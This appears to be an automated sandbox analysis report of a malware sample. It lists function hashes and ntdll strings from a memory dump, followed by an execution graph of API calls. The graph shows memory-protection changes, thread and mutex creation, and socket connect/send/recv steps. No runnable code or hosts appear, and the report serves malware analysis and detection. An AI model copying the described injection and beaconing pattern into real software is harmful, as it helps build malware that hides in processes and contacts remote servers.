                                            • Opcode ID: e2a85c1ca4a4687ec8c3a50288172fc323b6fd641ea47fd5ea300b943b9ecf47
                                            • Instruction ID: 99a865f107ddf20b90f3d4d282dd2e0fe28b844146a218f37322ad228f8d8327
                                            • Opcode Fuzzy Hash: e2a85c1ca4a4687ec8c3a50288172fc323b6fd641ea47fd5ea300b943b9ecf47
                                            • Instruction Fuzzy Hash: 1D90022130141402D102715C44156060049D7D1345F96C012F1424555DCA298A53A232
                                            Function 01A13090 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 676410da331512bd0951752249a1c05811fa354d23ff173ef2050abad66ee675
                                            • Instruction ID: 0e2d79448857559d4cb88a1adfe0cd786641b9cad91464c941836b638b535d1d
                                            • Opcode Fuzzy Hash: 676410da331512bd0951752249a1c05811fa354d23ff173ef2050abad66ee675
                                            • Instruction Fuzzy Hash: FE90022124141802D140715C84157070046D7D0601F56C011F0024554DCA1A8A6567B1
                                            Function 01A13010 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 21af0aea71ac2e9d1e228a8781609478148943dc078df0686af157652c9c996d
                                            • Instruction ID: 51430c34ba6ef01581c7930368c3e2d044393060fa32f546b53b6bef0e9de4f8
                                            • Opcode Fuzzy Hash: 21af0aea71ac2e9d1e228a8781609478148943dc078df0686af157652c9c996d
                                            • Instruction Fuzzy Hash: 4290022120185442D140725C4805B0F414597E1202F96C019F4156554CCD1989555721
                                            Function 01A135C0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 491d9afaab9f4cb1955feae5c3ebe09715acd5efa1b0ec33ac11bf5863098310
                                            • Instruction ID: 605cb9c439b6ddf85528ce1642a0d9e8fe8eda644945c502a2e96e8e42dbbb74
                                            • Opcode Fuzzy Hash: 491d9afaab9f4cb1955feae5c3ebe09715acd5efa1b0ec33ac11bf5863098310
                                            • Instruction Fuzzy Hash: D490023160551402D100715C4515706104597D0201F66C411F0424568DCB998A5166A2
                                            Function 01A139B0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ec38dfdf4863d4bf4921dc8911603cba073251286a07eb9014e55cfd8bd03a22
                                            • Instruction ID: 61e7604a454f1a5b742f8bdb515767e0ec1210fc9062086ac33268efb1e3555e
                                            • Opcode Fuzzy Hash: ec38dfdf4863d4bf4921dc8911603cba073251286a07eb9014e55cfd8bd03a22
                                            • Instruction Fuzzy Hash: 5E90022124546102D150715C44056164045B7E0201F56C021F0814594DC95989556321
                                            Function 01A13D10 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ada4db7974c154924c3399057640e651e4c9094273534fc89c9685d272fa8bb
                                            • Instruction ID: ce92a28225be76946e531115ee90f4040f11455e3b9757cbc9f0af93487faea7
                                            • Opcode Fuzzy Hash: 5ada4db7974c154924c3399057640e651e4c9094273534fc89c9685d272fa8bb
                                            • Instruction Fuzzy Hash: 1B900231202411429540725C5805A4E414597E1302F96D415F0015554CCD1889615321
                                            Function 01A13D70 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8ae52860214d9ecbd0909312d767c4d4f2d8f65755394e700414e96dab89c596
                                            • Instruction ID: 15b0083f7d1f46160f3c51215ef0efc3b766a8afeb1f9fa1fefc258a9fb43c7c
                                            • Opcode Fuzzy Hash: 8ae52860214d9ecbd0909312d767c4d4f2d8f65755394e700414e96dab89c596
                                            • Instruction Fuzzy Hash: AC90023520141402D510715C5805646008697D0301F56D411F0424558DCA5889A1A221
                                            Function 01A12C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: a97d8c90dfa3e1a9e16978671afeb0d1d11322fde2f13f2bf7548eaa18942065
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Function 01A12890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: f23705a2778caebd2fd550988282b2023890c7dd1cd6d94cb770af21aa92fb7b
                                            • Instruction ID: 9da5e5d859cf56466b34b19250f2271db6b829a39fec1365c4d9aaac5eaae8b1
                                            • Opcode Fuzzy Hash: f23705a2778caebd2fd550988282b2023890c7dd1cd6d94cb770af21aa92fb7b
                                            • Instruction Fuzzy Hash: B1510BB5A04116BFDB11DFACCA90A7EFBB8BB48240764C12AF4A9D7645D334DE0087E0
                                            Function 01A82410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 08aff5b2fb936f6d9d5ea1181f4ea51a87b418e1a59109a8e5056aecfe543498
                                            • Instruction ID: 3c78b6d5b3ea40d978aebea6979ff1535c6880f56baee148499fa5df3412e4d2
                                            • Opcode Fuzzy Hash: 08aff5b2fb936f6d9d5ea1181f4ea51a87b418e1a59109a8e5056aecfe543498
                                            • Instruction Fuzzy Hash: 54510775A40645AEDB34EF6CC990A7FBBF8EF44200B44846EE4D6D7642D674DA40C770
                                            Function 01A07630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                            Download Yara Rule
                                            Strings
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01A44787
                                            • ExecuteOptions, xrefs: 01A446A0
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A44725
                                            • Execute=1, xrefs: 01A44713
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A44742
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A446FC
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A44655
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 11990e0af913ab8c30fee699b9cdb3bc76e1e185d037ea92ba38979d8ac0142a
                                            • Instruction ID: c95f8afdcc1bb63f5901dc6fc06aafa82f499b5e1f293fa0fe32bcfed6f516ce
                                            • Opcode Fuzzy Hash: 11990e0af913ab8c30fee699b9cdb3bc76e1e185d037ea92ba38979d8ac0142a
                                            • Instruction Fuzzy Hash: 65512971600219ABEF12EBE9ED95FBE77B8AF58340F1400A9E606A71C1D770AA458F50
                                            Function 01AA6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                            • Instruction ID: 5720094231d3bd174dbf49456cededbc274daf7a719471b0b308ff400e053b8a
                                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                            • Instruction Fuzzy Hash: CE021671508342AFD315CF28C590A6BBBF5EFC8710F48892DFA898B264DB71E945CB52
                                            Function 01A1B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: 121c87826b776d0e8638f422f1d1dab56420ac38766706c5f75dfe37fda1e304
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: 8E81CE70E062498EEF25CF6CC8907FEBBB2AF55720F1C451AE861A7299C7348840CB71
                                            Function 01A820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$[$]:%u
                                            • API String ID: 48624451-2819853543
                                            • Opcode ID: 824a26d4c717123fb8a80a6b3253e4dfa87499fcf3fc74003e275e7ae974bddb
                                            • Instruction ID: 140028b690739e5b09da09d9e1f6765508f9a1cd656d1fdfa14e22a6cfed82f9
                                            • Opcode Fuzzy Hash: 824a26d4c717123fb8a80a6b3253e4dfa87499fcf3fc74003e275e7ae974bddb
                                            • Instruction Fuzzy Hash: E721627AA00219ABDB11EF79CD40BFEBBF9EF54650F54011AE905E3204E734DA11CBA1
                                            Function 019FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 01A4031E
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A402BD
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A402E7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 2a1a8000d2a09dcc020bda3e5b686c773cc47f981f3a84b396ee9533295d6612
                                            • Instruction ID: e112bce265f16297322733d104f6d013948d462378df7da773b32090b7c293b2
                                            • Opcode Fuzzy Hash: 2a1a8000d2a09dcc020bda3e5b686c773cc47f981f3a84b396ee9533295d6612
                                            • Instruction Fuzzy Hash: 82E1C072604741AFD725CF28C984B6ABBE4BF88714F140A5DF6A9CB2E1D774E844CB42
                                            Function 01A0BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 01A47BAC
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A47B7F
                                            • RTL: Resource at %p, xrefs: 01A47B8E
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: fc56a1fe3f10a0a0c07c32a091f3e3973cb187708f3e76c613ccbb7370070659
                                            • Instruction ID: af80285f56fa0de73bac64e1eaad07de98a1d7a2bb596b1edbd2ac078dc702c1
                                            • Opcode Fuzzy Hash: fc56a1fe3f10a0a0c07c32a091f3e3973cb187708f3e76c613ccbb7370070659
                                            • Instruction Fuzzy Hash: E64124753047028FD726DF29DA40B6AB7E5EF88710F100A1DFA5ADB2C0DB31E8058BA1
                                            Function 01A0B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A4728C
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 01A472C1
                                            • RTL: Resource at %p, xrefs: 01A472A3
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A47294
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: 2c6c65d682af8360955a972a0a4f8e856a9e17b45bb06ea4cb68cd028ca879d2
                                            • Instruction ID: b2e8eab188037a644119bf9472fd6e6ea6916661b579c0f29f005f9a27c1afb0
                                            • Opcode Fuzzy Hash: 2c6c65d682af8360955a972a0a4f8e856a9e17b45bb06ea4cb68cd028ca879d2
                                            • Instruction Fuzzy Hash: FE410E75700242AFC721CF69CE41B6ABBA5FB94710F140619F955EB280DB32F8568BE1
                                            Function 01A82300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: 809fc2e0eca5bf45a5ef1134209b374b7a761b4d02266dccac6b10598daa5fac
                                            • Instruction ID: c352495096973105c4bbf6720f3d234b094b8a7e0471636164e478c6c7c4f4bb
                                            • Opcode Fuzzy Hash: 809fc2e0eca5bf45a5ef1134209b374b7a761b4d02266dccac6b10598daa5fac
                                            • Instruction Fuzzy Hash: 32315476A002199FDB20EF2DCD50BFEB7F8EF54650F84455AE949E3240EB309A45CBA1
                                            Function 01A17D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: 00b67d8c1fb708fe9b4328deff444eb7c8b11b74cf7230780e1fbf007116c683
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: 9991B171E0021A9AEB24CFADC880ABFBBB5AF44320F68551AE955E72C8D7349940CB51
                                            Function 019D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 069c9fc34bb96864f3acd27c68c63dda1179f1a17b985ad296682d90f5bd555f
                                            • Instruction ID: 9039a424e9aa4c58d3df538349283c772b450d75f1d165bcd452734908ce2eb3
                                            • Opcode Fuzzy Hash: 069c9fc34bb96864f3acd27c68c63dda1179f1a17b985ad296682d90f5bd555f
                                            • Instruction Fuzzy Hash: 21810B75D002699BDB31DB64CC45BEAB7B8AF48714F0441EAAA1DB7280D7709E85CFA0

                                            Execution Graph

                                            Execution Coverage:2.3%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:4.7%
                                            Total number of Nodes:444
                                            Total number of Limit Nodes:15
                                            execution_graph 13943 107d0fbf 13945 107d1016 13943->13945 13944 107d10e8 13946 107d4382 ObtainUserAgentString 13944->13946 13947 107d10f0 13945->13947 13948 107cd8f2 NtProtectVirtualMemory 13945->13948 13949 107d10bb 13945->13949 13946->13947 13948->13949 13949->13944 13950 107cd8f2 NtProtectVirtualMemory 13949->13950 13950->13944 13868 107d38be 13870 107d38c3 13868->13870 13869 107d39a6 13870->13869 13871 107d3995 ObtainUserAgentString 13870->13871 13871->13869 13872 107d50b9 13873 107d51f0 13872->13873 13874 107d50ed 13872->13874 13874->13873 13875 107d8f82 6 API calls 13874->13875 13875->13873 13792 107d10fb 13794 107d1137 13792->13794 13793 107d12d5 13794->13793 13795 107cd8f2 NtProtectVirtualMemory 13794->13795 13796 107d128a 13795->13796 13797 107cd8f2 NtProtectVirtualMemory 13796->13797 13800 107d12a9 13797->13800 13798 107d12cd 13799 107d4382 ObtainUserAgentString 13798->13799 13799->13793 13800->13798 13801 107cd8f2 NtProtectVirtualMemory 13800->13801 13801->13798 13756 107d783a 13757 107d7841 13756->13757 13758 107d8f82 6 API calls 13757->13758 13760 107d78c5 13758->13760 13759 107d7906 13760->13759 13761 107d8232 NtCreateFile 13760->13761 13761->13759 13888 107d8f7a 13889 107d8fb8 13888->13889 13890 107d55b2 socket 13889->13890 13891 107d9081 13889->13891 13895 107d9022 13889->13895 13890->13891 13892 107d9134 13891->13892 13894 107d9117 getaddrinfo 13891->13894 13891->13895 13893 107d5732 connect 13892->13893 13892->13895 13897 107d91b2 13892->13897 13893->13897 13894->13892 13896 107d56b2 send 13899 107d9729 13896->13899 13897->13895 13897->13896 13898 107d97f4 setsockopt recv 13898->13895 13899->13895 13899->13898 13802 107d12f4 13803 107d1349 13802->13803 13804 107d149f 13803->13804 13806 107cd8f2 NtProtectVirtualMemory 13803->13806 13805 107cd8f2 NtProtectVirtualMemory 13804->13805 13809 107d14c3 13804->13809 13805->13809 13807 107d1480 13806->13807 13808 107cd8f2 NtProtectVirtualMemory 13807->13808 13808->13804 13810 107cd8f2 NtProtectVirtualMemory 13809->13810 13811 107d1597 13809->13811 13810->13811 13812 107cd8f2 NtProtectVirtualMemory 13811->13812 13815 107d15bf 13811->13815 13812->13815 13813 107d16e1 13814 107d4382 ObtainUserAgentString 13813->13814 13818 107d16e9 13814->13818 13816 107cd8f2 NtProtectVirtualMemory 13815->13816 13817 107d16b9 13815->13817 13816->13817 13817->13813 13819 107cd8f2 NtProtectVirtualMemory 13817->13819 13819->13813 13923 107da9f1 13924 107da9f7 13923->13924 13927 107cf852 13924->13927 13926 107daa0f 13928 107cf8e4 13927->13928 13929 107cf865 13927->13929 13928->13926 13929->13928 13931 107cf887 13929->13931 13933 107cf87e 13929->13933 13930 107d536f 13930->13926 13931->13928 13932 107d3662 6 API calls 13931->13932 13932->13928 13933->13930 13934 107d50c2 6 API calls 13933->13934 13934->13930 13820 107cd0f1 13821 107cd1d3 13820->13821 13822 107cd109 13820->13822 13823 107cd012 6 API calls 13822->13823 13824 107cd113 13823->13824 13824->13821 13825 107d8f82 6 API calls 13824->13825 13825->13821 13935 107ce5f1 13936 107ce60e 13935->13936 13937 107ce606 13935->13937 13938 107d3662 6 API calls 13937->13938 13938->13936 13951 107da9b3 13952 107da9bd 13951->13952 13955 107cf6d2 13952->13955 13954 107da9e0 13956 107cf704 13955->13956 13957 107cf6f7 13955->13957 13959 107cf6ff 13956->13959 13960 107cf72d 13956->13960 13962 107cf737 13956->13962 13958 107cd0f2 6 API calls 13957->13958 13958->13959 13959->13954 13964 107d52c2 13960->13964 13962->13959 13963 107d8f82 6 API calls 13962->13963 13963->13959 13965 107d52df 13964->13965 13966 107d52cb 13964->13966 13965->13959 13966->13965 13967 107d50c2 6 API calls 13966->13967 13967->13965 13713 107d8232 13715 107d825c 13713->13715 13716 107d8334 13713->13716 13714 107d8410 NtCreateFile 13714->13716 13715->13714 13715->13716 13565 107d9bac 13566 107d9bb1 13565->13566 13599 107d9bb6 13566->13599 13600 107cfb72 13566->13600 13568 107d9c2c 13569 107d9c85 13568->13569 13571 107d9c69 13568->13571 13572 107d9c54 13568->13572 13568->13599 13570 107d7ab2 NtProtectVirtualMemory 13569->13570 13575 107d9c8d 13570->13575 13573 107d9c6e 13571->13573 13574 107d9c80 13571->13574 13576 107d7ab2 NtProtectVirtualMemory 13572->13576 13577 107d7ab2 NtProtectVirtualMemory 13573->13577 13574->13569 13578 107d9c97 13574->13578 13636 107d1102 13575->13636 13580 107d9c5c 13576->13580 13582 107d9c76 13577->13582 13583 107d9c9c 13578->13583 13584 107d9cbe 13578->13584 13622 107d0ee2 13580->13622 13628 107d0fc2 13582->13628 13604 107d7ab2 13583->13604 13586 107d9cd9 13584->13586 13587 107d9cc7 13584->13587 13584->13599 13590 107d7ab2 NtProtectVirtualMemory 13586->13590 13586->13599 13589 107d7ab2 NtProtectVirtualMemory 13587->13589 13592 107d9ccf 13589->13592 13593 107d9ce5 13590->13593 13646 107d12f2 13592->13646 13664 107d1712 13593->13664 13602 107cfb93 13600->13602 13601 107cfcce 13601->13568 13602->13601 13603 107cfcb5 CreateMutexW 13602->13603 13603->13601 13606 107d7adf 13604->13606 13605 107d7ebc 13614 107d0de2 13605->13614 13606->13605 13676 107cd8f2 13606->13676 13608 107d7e5c 13609 107cd8f2 NtProtectVirtualMemory 13608->13609 13610 107d7e7c 13609->13610 13611 107cd8f2 NtProtectVirtualMemory 13610->13611 13612 107d7e9c 13611->13612 13613 107cd8f2 NtProtectVirtualMemory 13612->13613 13613->13605 13615 107d0df0 13614->13615 13617 107d0ecd 13615->13617 13701 107d4382 13615->13701 13618 107cd412 13617->13618 13620 107cd440 13618->13620 13619 107cd473 13619->13599 13620->13619 13621 107cd44d CreateThread 13620->13621 13621->13599 13624 107d0f06 13622->13624 13623 107d0fa4 13623->13599 13624->13623 13625 107cd8f2 NtProtectVirtualMemory 13624->13625 13626 107d0f9c 13625->13626 13627 107d4382 ObtainUserAgentString 13626->13627 13627->13623 13630 107d1016 13628->13630 13629 107d10f0 13629->13599 13630->13629 13633 107cd8f2 NtProtectVirtualMemory 13630->13633 13634 107d10bb 13630->13634 13631 107d10e8 13632 107d4382 ObtainUserAgentString 13631->13632 13632->13629 13633->13634 13634->13631 13635 107cd8f2 NtProtectVirtualMemory 13634->13635 13635->13631 13638 107d1137 13636->13638 13637 107d12d5 13637->13599 13638->13637 13639 107cd8f2 NtProtectVirtualMemory 13638->13639 13640 107d128a 13639->13640 13641 107cd8f2 NtProtectVirtualMemory 13640->13641 13644 107d12a9 13641->13644 13642 107d12cd 13643 107d4382 ObtainUserAgentString 13642->13643 13643->13637 13644->13642 13645 107cd8f2 NtProtectVirtualMemory 13644->13645 13645->13642 13647 107d1349 13646->13647 13648 107d149f 13647->13648 13650 107cd8f2 NtProtectVirtualMemory 13647->13650 13649 107cd8f2 NtProtectVirtualMemory 13648->13649 13653 107d14c3 13648->13653 13649->13653 13651 107d1480 13650->13651 13652 107cd8f2 NtProtectVirtualMemory 13651->13652 13652->13648 13654 107cd8f2 NtProtectVirtualMemory 13653->13654 13655 107d1597 13653->13655 13654->13655 13656 107cd8f2 NtProtectVirtualMemory 13655->13656 13659 107d15bf 13655->13659 13656->13659 13657 107d16e1 13658 107d4382 ObtainUserAgentString 13657->13658 13662 107d16e9 13658->13662 13660 107cd8f2 NtProtectVirtualMemory 13659->13660 13661 107d16b9 13659->13661 13660->13661 13661->13657 13663 107cd8f2 NtProtectVirtualMemory 13661->13663 13662->13599 13663->13657 13665 107d1767 13664->13665 13666 107cd8f2 NtProtectVirtualMemory 13665->13666 13670 107d1903 13665->13670 13667 107d18e3 13666->13667 13668 107cd8f2 NtProtectVirtualMemory 13667->13668 13668->13670 13669 107d19b7 13671 107d4382 ObtainUserAgentString 13669->13671 13672 107cd8f2 NtProtectVirtualMemory 13670->13672 13673 107d1992 13670->13673 13674 107d19bf 13671->13674 13672->13673 13673->13669 13675 107cd8f2 NtProtectVirtualMemory 13673->13675 13674->13599 13675->13669 13677 107cd987 13676->13677 13680 107cd9b2 13677->13680 13691 107ce622 13677->13691 13679 107cdc0c 13679->13608 13680->13679 13681 107cdba2 13680->13681 13683 107cdac5 13680->13683 13682 107d9e12 NtProtectVirtualMemory 13681->13682 13690 107cdb5b 13682->13690 13695 107d9e12 13683->13695 13685 107d9e12 NtProtectVirtualMemory 13685->13679 13686 107cdae3 13686->13679 13687 107cdb3d 13686->13687 13688 107d9e12 NtProtectVirtualMemory 13686->13688 13689 107d9e12 NtProtectVirtualMemory 13687->13689 13688->13687 13689->13690 